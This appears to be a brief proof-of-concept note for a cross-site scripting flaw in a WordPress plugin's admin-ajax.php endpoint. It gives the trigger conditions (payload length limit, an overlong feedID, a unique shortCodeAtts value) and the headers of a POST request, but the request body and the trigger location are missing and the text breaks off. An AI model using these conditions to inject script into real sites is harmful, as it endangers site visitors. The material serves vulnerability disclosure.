For the attack to be successful, the following requirements need to be meet
- Max payload size: 31 characters
- feedID parameter length must be greater than 31 characters to trigger the echo of unescaped data
- The shortCodeAtts parameter value must be uniq

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 192
Connection: close


XSS will be triggered at